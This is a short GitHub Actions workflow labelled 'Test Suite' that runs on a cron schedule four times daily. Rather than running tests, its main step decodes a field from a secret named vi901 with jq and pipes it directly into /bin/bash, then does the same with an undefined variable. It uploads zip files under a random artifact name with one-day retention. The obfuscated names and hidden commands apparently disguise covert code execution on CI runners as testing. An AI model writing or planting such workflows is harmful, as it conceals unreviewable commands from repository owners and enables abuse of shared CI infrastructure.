name: Test Suite
on:
  workflow_dispatch:

  schedule:
    - cron: '22 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  process:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Start
        env:
          vi901: ${{ secrets.vi901 }}
        run: |
          printf '%s' "$vi901" | jq -r .ez1845 | /bin/bash
          echo $yrtb50 | jq -r .ijws1 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: B5YqSIKO
          path: "*.zip"
          retention-days: 1
